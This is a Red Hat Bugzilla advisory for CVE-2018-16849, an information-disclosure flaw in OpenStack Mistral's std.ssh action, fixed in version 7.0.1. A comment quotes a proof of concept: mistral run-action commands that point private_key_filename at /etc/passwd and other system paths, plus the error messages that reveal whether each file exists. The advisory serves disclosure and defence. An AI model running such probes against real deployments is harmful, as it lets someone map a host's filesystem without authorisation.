Bug 1645334 (CVE-2018-16849) - CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Summary: CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arb...
Status: NEW
Alias: CVE-2018-16849
Product: Security Response
Classification: Other
Component: vulnerability   
(Show other bugs)
Version: unspecified
Hardware: All Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20181102,repor...
Keywords: Security
Depends On: 1645350 1645351 1679103
Blocks: 1623055
TreeView+ depends on / blocked
 
Reported: 2018-11-02 01:12 UTC by James Hebden
Modified: 2019-02-20 11:05 UTC (History)
16 users (show)

Fixed In Version: openstack-mistral 7.0.1
Doc Type: If docs needed, set a value
Doc Text:
An information disclosure is possible by manipulating the SSH private key filename of a std.ssh action in OpenStack Mistral before 7.0.1. Using this flaw, it is possible to determine the presence of a file path on the host executing the std.ssh action based on the returned error message.
Story Points: ---
Clone Of:
Environment:
Last Closed:
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

Description James Hebden 2018-11-02 01:12:48 UTC
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.

Comment 1 James Hebden 2018-11-02 02:59:43 UTC
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708

Comment 3 James Hebden 2018-11-02 03:31:36 UTC
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


Note You need to log in before you can comment on or make changes to this bug.